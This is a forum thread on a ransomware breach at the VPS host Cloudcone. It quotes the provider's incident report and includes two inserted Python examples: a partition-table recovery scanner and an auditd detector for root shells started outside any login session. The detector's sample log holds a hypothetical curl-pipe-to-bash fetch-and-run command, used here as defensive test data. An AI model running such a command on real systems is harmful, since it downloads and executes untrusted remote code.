Cloudcone hacked
According to information from OGF and Nodeseek, Cloudcone was hacked, but no more info has been given yet.
https://cdn.nodeimage.com/i/xxi1urTNiu6mmWas5hP0XFCBj1HHI9CZ.webp
Comments
Any official message?
!! Does anyone know what backend they were using? I wonder if there's a vulnerability.
They had bespoke/in-house backend.
I feel bad for them.
The stuff of nightmares.
TierHive - Hourly VPS - NAT Native - /24 per customer - Lab in the cloud - Free to try.
FREE tokens when you sign up, try before you buy. | Join us on Reddit
https://status.cloudcone.com/incidents/346624
Issue
We have identified an outage on our services; at this stage, some services should be facing network timeouts.
Our network engineers and sysadmins are investigating the issue at the moment.
January 30, 2026 · 08:48 AM
I can't log in to the client area.
It would be sad to see them go - I really liked @Cloudcone for their client area and services provided so far.
I reserve the right to license all of my content under: CC BY-NC-ND. Whatever happens on this forum should stay on this forum.
https://status.cloudcone.com/incidents/346624#activity-id-714050
What We First Observed
We were initially alerted to the incident when our monitoring systems detected that several VMs lost network connectivity. Upon investigating, we found ransom messages being displayed at boot on all of the affected VMs.
Our engineering teams immediately isolated the affected servers and began analysis. During the investigation, we confirmed that the boot sectors of impacted VM disks had been overwritten with the ransom message. We are attempting to recover the data by various means including examining raw block devices, reconstructing partition tables, and searching for intact filesystems.
How the Attack Was Executed
Meanwhile, the team investigating the breach discovered that a remote bash script (which is no longer accessible) had been executed across all affected nodes. Shell histories on those hosts had also been cleared. We performed a thorough review of authentication activity using system journals, rotated log files, login records and auditing data and found no evidence of unauthorized SSH access. All recorded user logins matched known internal accounts.
At this point, we started looking into other infrastructure that could have facilitated this attack and discovered that logs of one of our Virtualizor instances had been cleared from around the time of the incident. This is the Virtualizor instance that all of the affected nodes are connected to.
At this time, based on the available evidence, we believe that the attackers used the “Server Terminal” functionality within Virtualizor to gain shell access to connected nodes and execute the malicious script. This access method does not use SSH, which explains the lack of evidence relating to SSH connectivity, and we also discovered that this doesn’t leave any login records on the nodes (all root-level logins are also alerted via emails), explaining why we didn’t find anything out of the ordinary earlier.
Scope of Impact
We use Virtualizor instances to support our VPS services. At this time, we have confirmed that only nodes connected to a single Virtualizor instance were impacted. Nodes attached to our other platforms were not affected.
We also do not store personal or billing information of our users within virtualization platforms such as Virtualizor. Our investigation has found no evidence that customer databases or billing systems were accessed or compromised.
We are currently working on the way forward. All affected clients will be emailed, and we apologize for the inconvenience this has caused to all our affected clients.
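The recovery work the status update describes (examining raw block devices, reconstructing partition tables, searching for intact filesystems) comes down to one idea: a ransom note written over the MBR destroys the partition table and the boot code, but not the filesystem superblocks sitting further into the disk. The scanner below is an added example, not Cloudcone's tooling or anything from the status page. It walks a raw image one sector at a time looking for ext2/3/4 superblocks and NTFS boot sectors, maps every hit (ext backup superblocks included) back to the byte offset where its volume starts, and prints an sfdisk(8) script that could rebuild the table. The disk image, the ransom text and the volume geometry are constructed inside the script so it runs offline; nothing is written to any device.

```python
"""Locate filesystems on a raw disk image whose MBR / partition table has
been overwritten (added example, not Cloudcone's own tooling).

The image is scanned one sector at a time for ext2/3/4 superblocks and NTFS
boot sectors. Each hit is mapped back to the byte offset where its volume
starts (ext backup superblocks included, which corroborates the primary),
and the candidates are rendered as an sfdisk(8) script for rebuilding the
partition table. Nothing is written anywhere."""
import struct

SECTOR = 512
EXT_MAGIC = 0xEF53          # s_magic, at offset 0x38 of the superblock


def ext_superblock(sb):
    """Parse an ext2/3/4 superblock (offsets per the ext4 on-disk layout); None if it is not one."""
    if len(sb) < 1024 or struct.unpack_from("<H", sb, 0x38)[0] != EXT_MAGIC:
        return None
    blocks_count = struct.unpack_from("<I", sb, 0x04)[0]
    first_data_block = struct.unpack_from("<I", sb, 0x14)[0]
    log_block_size = struct.unpack_from("<I", sb, 0x18)[0]
    blocks_per_group = struct.unpack_from("<I", sb, 0x20)[0]
    group_nr = struct.unpack_from("<H", sb, 0x5A)[0]
    if log_block_size > 6 or not blocks_count or not blocks_per_group:
        return None             # magic matched but geometry is nonsense: false positive
    block_size = 1024 << log_block_size
    # The primary copy sits 1024 bytes into the volume; backup copy N sits in
    # the first block of group N. Either way the volume start can be recovered.
    if group_nr == 0:
        sb_offset = 1024
    else:
        sb_offset = (first_data_block + group_nr * blocks_per_group) * block_size
    label = sb[0x78:0x88].split(b"\0", 1)[0].decode("ascii", "replace")
    return {"fs": "ext", "size": blocks_count * block_size,
            "sb_offset": sb_offset, "label": label}


def ntfs_boot_sector(bs):
    """Parse an NTFS boot sector (OEM ID 'NTFS    ', 0x55AA trailer); None otherwise."""
    if len(bs) < 512 or bs[3:11] != b"NTFS    " or bs[510:512] != b"\x55\xaa":
        return None
    bytes_per_sector = struct.unpack_from("<H", bs, 0x0B)[0]
    total_sectors = struct.unpack_from("<Q", bs, 0x28)[0]
    if not bytes_per_sector or not total_sectors:
        return None
    return {"fs": "ntfs", "size": total_sectors * bytes_per_sector,
            "sb_offset": 0, "label": ""}


def scan_image(image):
    """Return [(volume_start_byte, info)] for every filesystem signature found,
    with all copies that resolve to the same start merged (info['hits'])."""
    found = {}
    for off in range(0, len(image), SECTOR):
        chunk = image[off:off + 1024]
        info = ext_superblock(chunk) or ntfs_boot_sector(chunk)
        if info is None:
            continue
        start = off - info["sb_offset"]
        if start < 0 or start % SECTOR:
            continue            # cannot be a sector-aligned volume start
        found.setdefault(start, dict(info, hits=0))["hits"] += 1
    return sorted(found.items())


def sfdisk_script(volumes):
    """Candidates as sfdisk script lines (MBR types: 83 = Linux, 07 = NTFS)."""
    lines = ["label: dos"]
    for start, v in volumes:
        ptype = "83" if v["fs"] == "ext" else "07"
        lines.append(f"start={start // SECTOR}, size={v['size'] // SECTOR}, type={ptype}")
    return "\n".join(lines)


def build_sample_image():
    """Constructed image: ransom text over the MBR, a 1 KiB-block ext volume
    spanning two block groups at 1 MiB, then a small NTFS volume."""
    ext_start, block_size, bpg, blocks = 1024 * 1024, 1024, 8192, 12000
    ntfs_start = ext_start + blocks * block_size
    ntfs_sectors = 4096
    img = bytearray(ntfs_start + ntfs_sectors * SECTOR)
    img[0:512] = (b"YOUR DISKS HAVE BEEN ENCRYPTED (constructed ransom note)\n" * 10)[:512]

    def put_ext_sb(offset, group):
        sb = bytearray(1024)
        struct.pack_into("<I", sb, 0x04, blocks)
        struct.pack_into("<I", sb, 0x14, 1)         # first_data_block is 1 for 1 KiB blocks
        struct.pack_into("<I", sb, 0x18, 0)         # log_block_size 0 -> 1024-byte blocks
        struct.pack_into("<I", sb, 0x20, bpg)
        struct.pack_into("<H", sb, 0x38, EXT_MAGIC)
        struct.pack_into("<H", sb, 0x5A, group)
        sb[0x78:0x7E] = b"vmroot"
        img[offset:offset + 1024] = sb

    put_ext_sb(ext_start + 1024, 0)                            # primary superblock
    put_ext_sb(ext_start + (1 + bpg) * block_size, 1)          # backup in group 1

    bs = bytearray(512)
    bs[3:11] = b"NTFS    "
    struct.pack_into("<H", bs, 0x0B, 512)
    struct.pack_into("<Q", bs, 0x28, ntfs_sectors)
    bs[510:512] = b"\x55\xaa"
    img[ntfs_start:ntfs_start + 512] = bs
    return bytes(img)


if __name__ == "__main__":
    print(sfdisk_script(scan_image(build_sample_image())))
```

For a real VM disk, pass an `mmap` of the raw image (or of `/dev/vdX` opened read-only) to `scan_image` instead of the constructed buffer, and mount a candidate read-only with `losetup -o <start_byte>` before trusting the sfdisk lines. An ext volume whose primary superblock was also wiped still shows up through its backup copies, which is why the hit count is worth printing: several copies agreeing on one start offset is much stronger evidence than a lone magic match.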
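The detection gap in the "How the Attack Was Executed" section is that a shell opened through the panel's Server Terminal never goes through sshd or login, so wtmp, the SSH logs and the root-login alerts all stay quiet. What does still differ at the kernel level is the audit loginuid: sshd and login set it through pam_loginuid, while a shell forked by a daemon that was started at boot inherits the daemon's unset value (4294967295). The script below is an added example, not Cloudcone's tooling and not something Virtualizor ships; it assumes auditd is recording execve (for instance with `-a always,exit -F arch=b64 -S execve -F euid=0 -k root_exec`) and that the panel's terminal process inherits an unset loginuid, which is the usual case for a service launched by init. The audit lines it parses are constructed, including the hypothetical `https://example.invalid/x.sh` fetch-and-run one-liner, and are hex-encoded the way auditd really encodes arguments that contain spaces.

```python
"""Flag root shells that were not started from a login session, from auditd
execve records (added example, not Cloudcone's own tooling).

sshd and login go through pam_loginuid, so every process in an SSH session
carries the user's auid and a session id. A shell spawned by a control-panel
daemon inherits the daemon's loginuid instead, which for a service started at
boot is the unset value 4294967295. Filtering root execve of a shell on that
field surfaces panel/console access that wtmp and the SSH logs never record.
Assumes auditd logs execve (-a always,exit -F arch=b64 -S execve -F euid=0 -k root_exec)."""
import re
from collections import defaultdict

AUID_UNSET = 4294967295
X86_64, EXECVE = "c000003e", "59"             # arch and syscall number as auditd prints them
SHELLS = {"/usr/bin/bash", "/bin/bash", "/usr/bin/sh", "/bin/sh", "/usr/bin/dash", "/bin/dash"}

RECORD_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def decode_value(field, value):
    """Unquote a value; hex-decode argv fields, which auditd encodes whenever
    the argument contains a space, a quote or a non-printable byte."""
    if value.startswith('"'):
        return value[1:-1]
    if field[0] == "a" and field[1:].isdigit() and len(value) % 2 == 0 \
            and re.fullmatch(r"[0-9A-Fa-f]+", value):
        return bytes.fromhex(value).decode("utf-8", "replace")
    return value


def parse_record(line):
    """One audit line -> (type, timestamp, event id, fields) or None."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    rtype, ts, eid, body = m.groups()
    fields = {k: decode_value(k, v) for k, v in FIELD_RE.findall(body)}
    return rtype, float(ts), int(eid), fields


def group_events(lines):
    """auditd writes several records per event (SYSCALL, EXECVE, CWD, PATH, ...);
    join them on the event id so argv and the credentials can be read together."""
    events = defaultdict(dict)
    for line in lines:
        rec = parse_record(line)
        if rec:
            rtype, ts, eid, fields = rec
            events[eid]["ts"] = ts
            events[eid].setdefault(rtype, {}).update(fields)
    return events


def find_sessionless_root_shells(lines):
    """Return execve events where a shell ran as root with no login session."""
    hits = []
    for eid, ev in sorted(group_events(lines).items()):
        sc = ev.get("SYSCALL", {})
        if (sc.get("arch"), sc.get("syscall")) != (X86_64, EXECVE):
            continue
        if sc.get("euid") != "0" or sc.get("exe") not in SHELLS:
            continue
        if int(sc.get("auid", AUID_UNSET)) != AUID_UNSET:
            continue                        # genuine login session: normal review path
        ex = ev.get("EXECVE", {})
        argv = [ex[f"a{i}"] for i in range(int(ex.get("argc", 0))) if f"a{i}" in ex]
        hits.append({"event": eid, "ts": ev["ts"], "pid": sc.get("pid"),
                     "ppid": sc.get("ppid"), "tty": sc.get("tty"), "argv": argv})
    return hits


# Constructed sample: one root shell from an SSH session (auid=1000, ses=88),
# then a root shell and its child curl spawned with no login session at all.
_PIPED = "curl -fsSL https://example.invalid/x.sh | bash"   # hypothetical fetch-and-run
SAMPLE_AUDIT_LOG = f"""\
type=SYSCALL msg=audit(1769762880.101:4101): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=2210 pid=30411 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=88 comm="bash" exe="/usr/bin/bash" key="root_exec"
type=EXECVE msg=audit(1769762880.101:4101): argc=1 a0="bash"
type=SYSCALL msg=audit(1769762912.404:4102): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=1188 pid=30422 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4294967295 comm="bash" exe="/usr/bin/bash" key="root_exec"
type=EXECVE msg=audit(1769762912.404:4102): argc=3 a0="bash" a1="-c" a2={_PIPED.encode().hex().upper()}
type=SYSCALL msg=audit(1769762913.010:4103): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=30422 pid=30423 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4294967295 comm="curl" exe="/usr/bin/curl" key="root_exec"
type=EXECVE msg=audit(1769762913.010:4103): argc=3 a0="curl" a1="-fsSL" a2="https://example.invalid/x.sh"
"""

if __name__ == "__main__":
    for h in find_sessionless_root_shells(SAMPLE_AUDIT_LOG.splitlines()):
        print(h)
```

Two caveats before wiring this into alerting. Root shells forked by systemd units also carry an unset loginuid, so baseline the `ppid` (the panel daemon's pid versus systemd's) rather than alerting on every hit. And because the attackers cleared shell histories and panel logs, the audit trail only helps if it leaves the box: ship it to a remote collector, since a local `/var/log/audit` is no harder to wipe than `.bash_history`.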
It's been a while since I used Virtualizor, but from what I remember, it does actually store personal information as standard; it's sucked over via the API into the end-user profile page. I just used the Virtualizor live demo and verified this.
Virtualizor emails customers when reinstalls, installs and other things happen, so this seems a bit odd. Not throwing shade, they have a custom control panel so maybe they have a tight API-only integration, but I have to question:
Just the immediate questions I am asking in my head, while also genuinely feeling the second-hand stress they must be under.